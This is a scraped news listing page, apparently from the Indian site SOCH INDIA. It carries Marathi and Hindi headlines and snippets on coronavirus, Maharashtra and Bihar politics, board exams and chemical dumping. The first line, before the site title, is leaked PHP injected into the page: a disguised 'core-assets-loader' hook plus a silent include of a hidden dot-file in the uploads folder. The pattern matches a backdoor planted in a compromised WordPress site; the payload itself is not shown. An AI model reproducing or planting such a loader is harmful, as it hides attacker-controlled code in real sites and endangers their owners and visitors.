add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

कोरोना वायरस के प्रकोप को देखते हुए एयर इंडिया के 10 क्रू मेंबर्स को निगरानी (क्वैरंटाइन) में रखने का फैसला किया गया है. ऐसा इसलिए किया जा रहा है क्योंकि 25 फरवरी को विएना से दिल्ली आए एयर इंडिया के एआई 154 विमान में एक यात्री का सैंपल टेस्ट...

Read More

आंतरराष्ट्रीय दहशतवादी ओसामा बिन लादेनची माहिती अमेरिकी गुप्तचर संस्था सीआयएला देणाऱ्या डॉक्टरने तुरुंगातच उपोषण सुरू केले आहे. लादेन पाकिस्तानच लपला असल्याची माहिती मिळाल्यानंतर अमेरिकेने त्याचा खात्मा केला होता. शकील आफ्रिदी असे या उपोषणकर्त्या डॉक्टरचे नाव आहे. सोमवारपासून त्याने उपोषण सुरू केले असल्याची माहिती आफ्रिदींच्या वकिलाने आणि त्याच्या भावाने दिली. आपल्या कुटुंबीयांना...

Read More

नव्याने स्थापन झालेले हे सरकार किती काळ टिकेल माहीत नाही. मात्र, तोपर्यंत आम्ही जनतेचे वकील म्हणून काम करू असे मत विरोधी पक्षनेते देवेंद्र फडणवीस यांनी व्यक्त केले. आमदार संजय केळकर, निरंजन डावखरे आणि ठाणे जिल्हा हौसिंग फेडरेशन यांच्या संयुक्त विद्यमाने आयोजित करण्यात आलेल्या गृहसंस्थांचा मेळावा या कार्यक्रमात ते बोलत...

Read More

महाराष्ट्र राज्य माध्यमिक आणि उच्च माध्यमिक शिक्षण मंडळाकडून घेण्यात येणाऱ्या इयत्ता दहावीच्या परीक्षेला उद्यापासून (३ मार्च) सुरुवात होणार आहे. राज्यभरात १७ लाख ६५हजार ८९८विद्यार्थी परीक्षा देणार आहेत, अशी माहिती मंडळाच्या अध्यक्षा शकुंतला काळे यांनी दिली आहे. यावेळी शकुंतला काळे यांनी सांगितले की, यंदा राज्यभरातील १७ लाख ६५ हजार ८९८विद्यार्थी...

Read More

देशभरामध्ये सुधारित नागरिकत्व कायदा (सीएए) आणि राष्ट्रीय नागरिकत्व नोंदणीवरुन (एनआरसी) आंदोलने सुरु आहेत. देशभरामध्ये एनआरसी लागू झाल्यास आपले नागरिकत्व रद्द होईल अशी भिती व्यक्त केली जात आहे. तर दुसरीकडे सरकारने यासंदर्भात वेळोवेळी आपली बाजू स्पष्ट करुन या दोन्ही कायद्यांना घाबरण्याची गरज नसल्याचे म्हटलं आहे. असं असलं तरी या दोन्ही...

Read More

‘कोरोना’ या जीवघेण्या विषाणूचा मोठा उद्रेक दिसून येत आहे. जगभरात नव्याने ३००० लोकांचा मृत्यू झाला आहे. एकट्या चीनमध्ये २,९१२ लोकांनी आपला जीव गमावला आहे. तसेच नव्या रिपोर्टनुसार आणखी ४२ जणांचा मृत्यू झाल्याची माहिती देण्यात आली आहे. राष्ट्रीय आरोग्य आयोगाने चीनमधील कोरोनो विषाणू बाधितांचा आकडा जाहीर केला आहे. आरोग्य अधिकाऱ्यांनी जानेवारीच्या...

Read More

जगातील ८६ हजाराहून अधिक नागरिकांना करोना विषाणूचा संसर्ग झाल्याचे निष्पन्न झाले असून रविवारी अमेरिका, ऑस्ट्रेलिया आणि थायलंडमध्ये प्रत्येकी एका रुग्णाचा मृत्यू झाला. जागतिक आरोग्य संघटनेने जाहीर केलेल्या आकडेवारीनुसार चीनमध्ये आतापर्यंत २,८७० करोना रुग्णांचा मृत्यू झाला, तर ७९,८२४ जणांना संसर्ग झाला आहे. चीनमध्ये शनिवारी ३५ रुग्णांचा मृत्यू झाला तर नवे...

Read More

बिहारमध्ये राष्ट्रीय लोकशाही आघाडी एकत्र असून, विधानसभा निवडणुकीत दोनशेहून अधिक जाग जिंकू असा विश्वास मुख्यमंत्री नितीशकुमार यांनी व्यक्त केला. राज्यात विधानसभेच्या २४३ जागा असून, या वर्षांअखेरीस निवडणूक अपेक्षित आहे. संयुक्त जनता दलाच्या कार्यकर्ता संमेलनात नितीशकुमार यांनी कार्यकर्त्यांनी रालोआच्या विजयासाठी परिश्रम करावेत असे आवाहन केले. राष्ट्रीय नागरिक नोंदणीच्या विरोधात बिहार...

Read More

महाडस्थित एका कंपनीमधील घातक टाकाऊ रसायन दोन टँकरद्वारे तळोजा येथील कासाडी नदीपात्रात सोडणाऱ्यांना शुक्रवारी मध्यरात्री पकडून स्थानिकांनी पोलिसांच्या स्वाधीन केले. नदीपात्र प्रदूषित झाल्याने येथील नागरिकांना गेल्या काही दिवसांपासून श्वसनाचा त्रास जाणवू लागला होता. हे घातक रसायन महाड औद्योगिक वसाहतीमधील ‘हायकल’ कंपनीतून आणण्यात आले होते. कळंबोलीतील गुरुद्वाराशेजारील नागरिकांनाही या प्रदूषणाचा...

Read More

भाजपाचे आमदार आशिष शेलार यांनी आज पुन्हा एकदा महाराष्ट्र नवनिर्माण सेनेचे अध्यक्ष राज ठाकरे यांची त्यांच्या कृष्णकुंज निवासस्थानी भेट घेतली. या भेटीनंतर राजकीय वर्तुळात पुन्हा एकदा विविध तर्क-वितर्क लढवण्यात येत आहेत. दोन्ही नेत्यांमध्ये जवळपास तासभर चर्चा झाली. राज्यात महाविकास आघाडीचे सरकार स्थापन झाल्यापासून राजकीय समीकरणे बदलली आहेत. काँग्रेस-राष्ट्रवादी आणि...

Read More